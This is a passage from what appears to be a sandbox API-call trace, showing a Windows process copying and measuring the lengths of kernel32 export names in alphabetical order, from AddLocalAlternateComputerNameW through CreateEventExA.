returned="AddLocalAlternateComputerNameW" [0087.596] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.596] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.596] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.596] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.596] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.596] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.596] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.596] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.596] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.596] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.596] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.596] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.596] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.596] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.596] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.596] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.596] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.596] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.596] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.596] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.597] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.597] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.597] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.597] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.597] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0087.597] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.597] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.597] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.597] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.597] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.597] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.597] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.597] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.597] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.597] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.597] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.597] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.597] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.597] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.597] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.598] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.598] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.598] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.598] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.598] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.598] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.598] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.598] lstrlenA (lpString="BEEP") returned 4 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.598] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.598] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.598] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.598] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.598] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.598] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.598] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.598] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.598] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.598] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.598] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.599] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.599] lstrlenA (lpString="CANCELIO") returned 8 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.599] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.599] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.599] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.599] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.599] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.599] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.599] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.599] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.599] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.599] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.599] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.599] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.599] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.599] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.599] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.599] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.599] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.599] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.600] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.600] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.600] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.600] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.600] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.600] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.600] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.600] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.600] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.600] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.600] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.600] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.600] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.600] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.600] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.600] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.600] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.600] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.600] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.600] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.601] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.601] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.601] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.601] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.601] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.601] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.601] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.601] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.601] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.601] lstrlenA (lpString="COPYFILEA") returned 9 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.601] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.601] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.601] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.601] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.601] lstrlenA (lpString="COPYFILEW") returned 9 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.601] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.601] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.601] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.601] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.602] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.602] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.602] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.602] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.602] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.602] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.602] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.602] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.602] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.602] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.602] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" 